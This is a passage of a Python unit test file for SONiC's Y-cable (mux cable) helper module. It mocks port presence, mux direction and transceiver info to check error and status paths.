    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=False))
    def test_get_ycable_physical_port_from_logical_port_physical_port_list_empty(self):
        # Empty mapping -> -1.
        instance = get_ycable_physical_port_from_logical_port("Ethernet0")
        assert(instance == -1)
    @patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
    def test_get_ycable_port_instance_from_logical_port(self):
        # Instance registered for the physical port is returned directly.
        with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
            patched_util.get.return_value = 0
            instance = get_ycable_port_instance_from_logical_port("Ethernet0")
            assert(instance == 0)

    @patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=False))
    def test_get_ycable_port_instance_from_logical_port_no_presence(self):
        # Cable absent -> PORT_INSTANCE_ERROR sentinel.
        with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
            patched_util.get.return_value = 0
            instance = get_ycable_port_instance_from_logical_port("Ethernet0")
            assert(instance == PORT_INSTANCE_ERROR)

    @patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
    def test_get_ycable_port_instance_from_logical_port_no_port_instance(self):
        # Registry yields None (mock_get() returns None) -> PORT_INSTANCE_ERROR.
        with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
            def mock_get():
                pass
            patched_util.get.return_value = mock_get()
            instance = get_ycable_port_instance_from_logical_port("E")
            assert(instance == PORT_INSTANCE_ERROR)

    @patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0, 1, 2]))
    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
    def test_get_ycable_port_instance_from_logical_port_multiple_mapping(self):
        # Multiple physical ports for one logical port -> -1.
        with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
            patched_util.get.return_value = 0
            instance = get_ycable_port_instance_from_logical_port("Ethernet0")
            assert(instance == -1)
def test_update_table_mux_status_for_response_tbl(self):
asic_index = 0
appl_db = "TEST_DB"
logical_port_name = "Ethernet0"
status = "standby"
test_table = swsscommon.Table(appl_db[asic_index], "XCVRD_TEST_TABLE")
update_table_mux_status_for_response_tbl(
test_table, status, logical_port_name)
rc = test_table.get(logical_port_name)
# Since the table class is mocked, the most we can test for is that get doesn't return None
assert(type(rc) != None)
    def test_set_result_and_delete_port(self):
        # Writes the result to the response table and deletes the port from
        # the command table; returns None on success (tables are mocked).
        result = "result"
        actual_result = "pass"
        # NOTE(review): appl_db[0]/appl_db[1] index single characters of the
        # string — inert here since swsscommon.Table is a MagicMock.
        appl_db = "TEST_DB"
        port = 0
        command_table = swsscommon.Table(appl_db[0], "XCVRD_COMMAND_TABLE")
        response_table = swsscommon.Table(appl_db[1], "XCVRD_RESPONSE_TABLE")
        rc = set_result_and_delete_port(
            result, actual_result, command_table, response_table, port)
        assert(rc == None)

    def test_delete_port_from_y_cable_table(self):
        # Deleting a logical port from the (mocked) Y-cable table returns None.
        logical_port_name = "Ethernet0"
        appl_db = "TEST_DB"
        y_cable_tbl = swsscommon.Table(appl_db[0], "XCVRD_Y_CBL_TABLE")
        rc = delete_port_from_y_cable_table(logical_port_name, y_cable_tbl)
        assert(rc == None)
    @patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
    def test_update_appdb_port_mux_cable_response_table_port_instance_none(self):
        # Port-instance registry yields None -> function still completes,
        # returning None.
        asic_index = 0
        appl_db = "TEST_DB"
        logical_port_name = "Ethernet0"
        read_side = 1
        with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
            def mock_get():
                pass
            patched_util.get.return_value = mock_get()
            rc = update_appdb_port_mux_cable_response_table(
                logical_port_name, asic_index, appl_db, read_side)
            assert(rc == None)

    @patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
    def test_update_appdb_port_mux_cable_response_table_read_side_none(self):
        # read_side of None (mock_read_side() returns None) is tolerated.
        asic_index = 0
        appl_db = "TEST_DB"
        logical_port_name = "Ethernet0"
        with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
            def mock_read_side():
                pass
            read_side = mock_read_side()
            patched_util.get.return_value = 0
            rc = update_appdb_port_mux_cable_response_table(
                logical_port_name, asic_index, appl_db, read_side)
            assert(rc == None)
    @patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
    def test_update_appdb_port_mux_cable_response_table_active_side_none(self):
        # get_mux_direction raising (no self arg) simulates an unreadable
        # active side; the function still returns None.
        asic_index = 0
        appl_db = "TEST_DB"
        logical_port_name = "Ethernet0"
        read_side = 1
        with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
            class PortInstanceHelper():
                def __init__(self):
                    self.EEPROM_ERROR = -1
                # Defining function without self argument creates an exception,
                # which is what we want for this test.
                def get_mux_direction():
                    pass
            patched_util.get.return_value = PortInstanceHelper()
            rc = update_appdb_port_mux_cable_response_table(
                logical_port_name, asic_index, appl_db, read_side)
            assert(rc == None)

    @patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
    def test_update_appdb_port_mux_cable_response_table_active_side_is_read_side(self):
        # Mux direction equals read side (both 1) -> completes, returns None.
        asic_index = 0
        appl_db = "TEST_DB"
        logical_port_name = "Ethernet0"
        read_side = 1
        with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
            class PortInstanceHelper():
                def __init__(self):
                    self.EEPROM_ERROR = -1
                def get_mux_direction(self):
                    return 1
            patched_util.get.return_value = PortInstanceHelper()
            rc = update_appdb_port_mux_cable_response_table(
                logical_port_name, asic_index, appl_db, read_side)
            assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
def test_update_appdb_port_mux_cable_response_table_active_side_not_read_side(self):
    """Active side (1) differs from read side (2): helper returns None."""
    appl_db = "TEST_DB"
    asic_index = 0
    read_side = 2
    with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
        class FakePortInstance():
            def __init__(self):
                self.EEPROM_ERROR = -1

            def get_mux_direction(self):
                # Opposite side from read_side above.
                return 1
        patched_util.get.return_value = FakePortInstance()
        result = update_appdb_port_mux_cable_response_table(
            "Ethernet0", asic_index, appl_db, read_side)
        assert result is None
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
def test_update_appdb_port_mux_cable_response_table_active_side_status_unknown(self):
    """Mux direction 4 (neither side): status is unknown, helper returns None."""
    appl_db = "TEST_DB"
    asic_index = 0
    read_side = 1
    with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
        class FakePortInstance():
            def __init__(self):
                self.EEPROM_ERROR = -1

            def get_mux_direction(self):
                # Not a valid side value -> "unknown".
                return 4
        patched_util.get.return_value = FakePortInstance()
        result = update_appdb_port_mux_cable_response_table(
            "Ethernet0", asic_index, appl_db, read_side)
        assert result is None
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=False))
def test_update_appdb_port_mux_cable_response_table_no_presence_status_unknown(self):
    """Transceiver absent (presence mocked False): helper returns None."""
    appl_db = "TEST_DB"
    asic_index = 0
    read_side = 1
    with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
        class FakePortInstance():
            def __init__(self):
                self.EEPROM_ERROR = -1

            def get_mux_direction(self):
                return 4
        patched_util.get.return_value = FakePortInstance()
        result = update_appdb_port_mux_cable_response_table(
            "Ethernet0", asic_index, appl_db, read_side)
        assert result is None
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0, 1, 2]))
def test_update_appdb_port_mux_cable_response_table_invalid_ycable_mapping(self):
    """A 1:3 logical-to-physical mapping is invalid for a Y-cable: returns None."""
    appl_db = "TEST_DB"
    asic_index = 0
    read_side = 1
    with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
        class FakePortInstance():
            def __init__(self):
                self.EEPROM_ERROR = -1

            def get_mux_direction(self):
                return 4
        patched_util.get.return_value = FakePortInstance()
        result = update_appdb_port_mux_cable_response_table(
            "Ethernet0", asic_index, appl_db, read_side)
        assert result is None
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0, 1, 2]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
def test_read_y_cable_and_update_statedb_port_tbl_invalid_ycable_mapping(self):
    """A 1:3 logical-to-physical mapping is invalid: helper returns None."""
    appl_db = "TEST_DB"
    asic_index = 0
    statedb_port_tbl = {
        asic_index: swsscommon.Table(appl_db[asic_index], "STATEDB_PORT_TABLE")
    }
    result = read_y_cable_and_update_statedb_port_tbl(
        "Ethernet0", statedb_port_tbl[asic_index])
    assert result is None
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_read_y_cable_and_update_statedb_port_tbl_port_instance_none(self):
    """Port instance lookup yields None: helper returns None."""
    appl_db = "TEST_DB"
    asic_index = 0
    statedb_port_tbl = {
        asic_index: swsscommon.Table(appl_db[asic_index], "STATEDB_PORT_TABLE")
    }
    with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
        # No instance registered for this port (the original built None
        # by calling a bare "pass" function).
        patched_util.get.return_value = None
        result = read_y_cable_and_update_statedb_port_tbl(
            "Ethernet0", statedb_port_tbl[asic_index])
        assert result is None
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=False))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_read_y_cable_and_update_statedb_port_tbl_get_presence_false(self):
    """Transceiver absent (presence mocked False): helper returns None."""
    appl_db = "TEST_DB"
    asic_index = 0
    statedb_port_tbl = {
        asic_index: swsscommon.Table(appl_db[asic_index], "STATEDB_PORT_TABLE")
    }
    with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
        patched_util.get.return_value = None
        result = read_y_cable_and_update_statedb_port_tbl(
            "Ethernet0", statedb_port_tbl[asic_index])
        assert result is None
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_read_y_cable_and_update_statedb_port_tbl_port_instance_get_read_side_exception(self):
    """A failing get_read_side() makes the helper return None."""
    appl_db = "TEST_DB"
    asic_index = 0
    statedb_port_tbl = {
        asic_index: swsscommon.Table(appl_db[asic_index], "STATEDB_PORT_TABLE")
    }
    with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
        class BrokenPortInstance():
            def __init__(self):
                self.EEPROM_ERROR = -1

            # Deliberately defined without "self": calling it on the
            # instance raises, which is the error path under test.
            def get_read_side():
                pass
        patched_util.get.return_value = BrokenPortInstance()
        result = read_y_cable_and_update_statedb_port_tbl(
            "Ethernet0", statedb_port_tbl[asic_index])
        assert result is None
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_read_y_cable_and_update_statedb_port_tbl_port_instance_get_mux_dir_exception(self):
    """get_read_side() works but get_mux_direction() fails: helper returns None."""
    appl_db = "TEST_DB"
    asic_index = 0
    statedb_port_tbl = {
        asic_index: swsscommon.Table(appl_db[asic_index], "STATEDB_PORT_TABLE")
    }
    with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
        class BrokenPortInstance():
            def __init__(self):
                self.EEPROM_ERROR = -1

            def get_read_side(self):
                return 1

            # Deliberately defined without "self": calling it on the
            # instance raises, which is the error path under test.
            def get_mux_direction():
                pass
        patched_util.get.return_value = BrokenPortInstance()
        result = read_y_cable_and_update_statedb_port_tbl(
            "Ethernet0", statedb_port_tbl[asic_index])
        assert result is None
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_read_y_cable_and_update_statedb_port_tbl_port_instance_status_active(self):
    """Mux direction equals read side (active): helper returns None."""
    appl_db = "TEST_DB"
    asic_index = 0
    statedb_port_tbl = {
        asic_index: swsscommon.Table(appl_db[asic_index], "STATEDB_PORT_TABLE")
    }
    with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
        class FakePortInstance():
            def __init__(self):
                self.EEPROM_ERROR = -1

            def get_read_side(self):
                return 1

            def get_mux_direction(self):
                # Same as read side -> port is "active".
                return 1
        patched_util.get.return_value = FakePortInstance()
        result = read_y_cable_and_update_statedb_port_tbl(
            "Ethernet0", statedb_port_tbl[asic_index])
        assert result is None
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_read_y_cable_and_update_statedb_port_tbl_port_instance_status_standby(self):
    """Mux direction differs from read side (standby): helper returns None."""
    appl_db = "TEST_DB"
    asic_index = 0
    statedb_port_tbl = {
        asic_index: swsscommon.Table(appl_db[asic_index], "STATEDB_PORT_TABLE")
    }
    with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
        class FakePortInstance():
            def __init__(self):
                self.EEPROM_ERROR = -1

            def get_read_side(self):
                return 1

            def get_mux_direction(self):
                # Opposite of read side -> port is "standby".
                return 2
        patched_util.get.return_value = FakePortInstance()
        result = read_y_cable_and_update_statedb_port_tbl(
            "Ethernet0", statedb_port_tbl[asic_index])
        assert result is None
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_read_y_cable_and_update_statedb_port_tbl_port_instance_status_unknown(self):
    """Mux direction 0 (neither side): status unknown, helper returns None."""
    appl_db = "TEST_DB"
    asic_index = 0
    statedb_port_tbl = {
        asic_index: swsscommon.Table(appl_db[asic_index], "STATEDB_PORT_TABLE")
    }
    with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
        class FakePortInstance():
            def __init__(self):
                self.EEPROM_ERROR = -1

            def get_read_side(self):
                return 1

            def get_mux_direction(self):
                # Not a valid side value -> "unknown".
                return 0
        patched_util.get.return_value = FakePortInstance()
        result = read_y_cable_and_update_statedb_port_tbl(
            "Ethernet0", statedb_port_tbl[asic_index])
        assert result is None
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_create_tables_and_insert_mux_unknown_entries(self):
    """Smoke test: inserting 'unknown' mux entries with empty tables returns None."""
    asic_index = 0
    state_db = {}
    y_cable_tbl = {}
    static_tbl = {}
    mux_tbl = {}
    result = create_tables_and_insert_mux_unknown_entries(
        state_db, y_cable_tbl, static_tbl, mux_tbl, asic_index, "Ethernet0")
    assert result is None
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_check_identifier_presence_and_update_mux_table_entry_status_false(self):
    """Port table get() reporting failure (status False): helper returns None."""
    asic_index = 0
    test_db = "TEST_DB"
    state_db = {}
    y_cable_presence = True
    y_cable_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], swsscommon.STATE_HW_MUX_CABLE_TABLE_NAME)}
    static_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], MUX_CABLE_STATIC_INFO_TABLE)}
    mux_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], MUX_CABLE_INFO_TABLE)}
    port_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], "PORT_INFO_TABLE")}
    # status False signals the lookup itself failed.
    port_tbl[asic_index].get.return_value = (False, [('state', "manual")])
    result = check_identifier_presence_and_update_mux_table_entry(
        state_db, port_tbl, y_cable_tbl, static_tbl, mux_tbl,
        asic_index, "Ethernet0", y_cable_presence)
    assert result is None
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_check_identifier_presence_and_update_mux_table_entry_state_absent(self):
    """Field-value pairs missing the 'state' key: helper returns None."""
    asic_index = 0
    test_db = "TEST_DB"
    state_db = {}
    y_cable_presence = True
    y_cable_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], swsscommon.STATE_HW_MUX_CABLE_TABLE_NAME)}
    static_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], MUX_CABLE_STATIC_INFO_TABLE)}
    mux_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], MUX_CABLE_INFO_TABLE)}
    port_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], "PORT_INFO_TABLE")}
    # 'badstate' instead of 'state' -> the expected key is absent.
    port_tbl[asic_index].get.return_value = (True, [('badstate', "auto")])
    result = check_identifier_presence_and_update_mux_table_entry(
        state_db, port_tbl, y_cable_tbl, static_tbl, mux_tbl,
        asic_index, "Ethernet0", y_cable_presence)
    assert result is None
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_check_identifier_presence_and_update_mux_table_entry_bad_state_value(self):
    """Unrecognized 'state' value: helper returns None."""
    asic_index = 0
    test_db = "TEST_DB"
    state_db = {}
    y_cable_presence = True
    y_cable_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], swsscommon.STATE_HW_MUX_CABLE_TABLE_NAME)}
    static_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], MUX_CABLE_STATIC_INFO_TABLE)}
    mux_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], MUX_CABLE_INFO_TABLE)}
    port_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], "PORT_INFO_TABLE")}
    # "badvalue" is not a valid mux state.
    port_tbl[asic_index].get.return_value = (True, [('state', "badvalue")])
    result = check_identifier_presence_and_update_mux_table_entry(
        state_db, port_tbl, y_cable_tbl, static_tbl, mux_tbl,
        asic_index, "Ethernet0", y_cable_presence)
    assert result is None
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=False))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_check_identifier_presence_and_update_mux_table_entry_no_presence(self):
    """Valid port config but transceiver absent: helper returns None."""
    asic_index = 0
    test_db = "TEST_DB"
    state_db = {}
    y_cable_presence = True
    y_cable_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], swsscommon.STATE_HW_MUX_CABLE_TABLE_NAME)}
    static_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], MUX_CABLE_STATIC_INFO_TABLE)}
    mux_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], MUX_CABLE_INFO_TABLE)}
    port_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], "PORT_INFO_TABLE")}
    port_tbl[asic_index].get.return_value = (
        True, [('state', "auto"), ('read_side', 1)])
    result = check_identifier_presence_and_update_mux_table_entry(
        state_db, port_tbl, y_cable_tbl, static_tbl, mux_tbl,
        asic_index, "Ethernet0", y_cable_presence)
    assert result is None
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_check_identifier_presence_and_update_mux_table_entry_no_port_info(self):
    """Transceiver info dict unavailable (None): helper returns None."""
    asic_index = 0
    test_db = "TEST_DB"
    state_db = {}
    y_cable_presence = True
    y_cable_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], swsscommon.STATE_HW_MUX_CABLE_TABLE_NAME)}
    static_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], MUX_CABLE_STATIC_INFO_TABLE)}
    mux_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], MUX_CABLE_INFO_TABLE)}
    port_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], "PORT_INFO_TABLE")}
    port_tbl[asic_index].get.return_value = (
        True, [('state', "auto"), ('read_side', 1)])
    with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
        patched_util.get_transceiver_info_dict.return_value = None
        result = check_identifier_presence_and_update_mux_table_entry(
            state_db, port_tbl, y_cable_tbl, static_tbl, mux_tbl,
            asic_index, "Ethernet0", y_cable_presence)
        assert result is None
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0, 1, 2]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_check_identifier_presence_and_update_mux_table_entry_multiple_port_instances(self):
    """A logical port mapping to several physical ports: helper returns None."""
    asic_index = 0
    test_db = "TEST_DB"
    state_db = {}
    y_cable_presence = True
    y_cable_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], swsscommon.STATE_HW_MUX_CABLE_TABLE_NAME)}
    static_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], MUX_CABLE_STATIC_INFO_TABLE)}
    mux_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], MUX_CABLE_INFO_TABLE)}
    port_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], "PORT_INFO_TABLE")}
    port_tbl[asic_index].get.return_value = (
        True, [('state', "auto"), ('read_side', 1)])
    with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
        patched_util.get_transceiver_info_dict.return_value = {
            'manufacturer': 'Microsoft', 'model': 'simulated'}
        result = check_identifier_presence_and_update_mux_table_entry(
            state_db, port_tbl, y_cable_tbl, static_tbl, mux_tbl,
            asic_index, "Ethernet0", y_cable_presence)
        assert result is None
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_check_identifier_presence_and_update_mux_table_entry_no_vendor_port_info(self):
    """Transceiver info lacking the 'manufacturer' key: helper returns None."""
    asic_index = 0
    test_db = "TEST_DB"
    state_db = {}
    y_cable_presence = True
    y_cable_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], swsscommon.STATE_HW_MUX_CABLE_TABLE_NAME)}
    static_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], MUX_CABLE_STATIC_INFO_TABLE)}
    mux_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], MUX_CABLE_INFO_TABLE)}
    port_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], "PORT_INFO_TABLE")}
    port_tbl[asic_index].get.return_value = (
        True, [('state', "auto"), ('read_side', 1)])
    with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
        patched_util.get_transceiver_info_dict.return_value = {
            'bad_manufacturer': 'Microsoft', 'model': 'simulated'}
        result = check_identifier_presence_and_update_mux_table_entry(
            state_db, port_tbl, y_cable_tbl, static_tbl, mux_tbl,
            asic_index, "Ethernet0", y_cable_presence)
        assert result is None
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_check_identifier_presence_and_update_mux_table_entry_no_model_port_info(self):
    """Transceiver info lacking the 'model' key: helper returns None."""
    asic_index = 0
    test_db = "TEST_DB"
    state_db = {}
    y_cable_presence = True
    y_cable_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], swsscommon.STATE_HW_MUX_CABLE_TABLE_NAME)}
    static_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], MUX_CABLE_STATIC_INFO_TABLE)}
    mux_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], MUX_CABLE_INFO_TABLE)}
    port_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], "PORT_INFO_TABLE")}
    port_tbl[asic_index].get.return_value = (
        True, [('state', "auto"), ('read_side', 1)])
    with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
        patched_util.get_transceiver_info_dict.return_value = {
            'manufacturer': 'Microsoft', 'bad_model': 'simulated'}
        result = check_identifier_presence_and_update_mux_table_entry(
            state_db, port_tbl, y_cable_tbl, static_tbl, mux_tbl,
            asic_index, "Ethernet0", y_cable_presence)
        assert result is None
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_check_identifier_presence_and_update_mux_table_entry_invalid_vendor_port_info(self):
    """Unrecognized manufacturer value: helper returns None."""
    asic_index = 0
    test_db = "TEST_DB"
    state_db = {}
    y_cable_presence = True
    y_cable_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], swsscommon.STATE_HW_MUX_CABLE_TABLE_NAME)}
    static_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], MUX_CABLE_STATIC_INFO_TABLE)}
    mux_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], MUX_CABLE_INFO_TABLE)}
    port_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], "PORT_INFO_TABLE")}
    port_tbl[asic_index].get.return_value = (
        True, [('state', "auto"), ('read_side', 1)])
    with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
        patched_util.get_transceiver_info_dict.return_value = {
            'manufacturer': 'not_Microsoft', 'model': 'simulated'}
        result = check_identifier_presence_and_update_mux_table_entry(
